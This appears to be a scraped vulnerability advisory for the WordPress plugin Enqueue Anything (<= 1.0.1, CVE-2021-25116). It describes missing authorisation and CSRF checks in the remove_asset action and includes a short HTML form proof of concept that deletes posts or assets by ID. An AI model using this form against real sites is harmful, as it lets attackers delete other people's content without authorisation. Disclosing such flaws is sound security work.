Lucene search
Abhishek bhoirWPEX-ID:140A15B6-12C8-4F03-A877-3876DB866852HistoryMay 17, 2022 - 12:00 a.m.
Enqueue Anything <= 1.0.1 - Subscriber+ Arbitrary Asset/Post Deletion
2022-05-1700:00:00
abhishek bhoir
70
0.001 Low
EPSS
Percentile
21.2%
The plugin does not have authorisation and CSRF checks in the remove_asset AJAX action, and does not ensure that the item to be deleted is actually an asset. As a result, low privilege users such as subscriber could delete arbitrary assets, as well as put arbitrary posts in the trash. v1.0.1 added a check to ensure post to be removed is an asset. However the plugin is still missing capability and CSRF checks
As a subscriber, or via CSRF against any authenticated user
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="remove_asset" />
<input type="hidden" name="id" value="289" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Related
cnvd
cnvd
WordPress Enqueue Anything pluginθ·¨η«θ―·ζ±δΌͺι ζΌζ΄
2022-06-15 00:00:00
patchstack
patchstack
cve
cve
CVE-2021-25116
2022-06-13 13:15:09
prion
prion
Cross site request forgery (csrf)
2022-06-13 13:15:00
cvelist
cvelist
nvd
nvd
CVE-2021-25116
2022-06-13 13:15:09
wpvulndb
wpvulndb
Enqueue Anything <= 1.0.1 - Subscriber+ Arbitrary Asset/Post Deletion
2022-05-17 00:00:00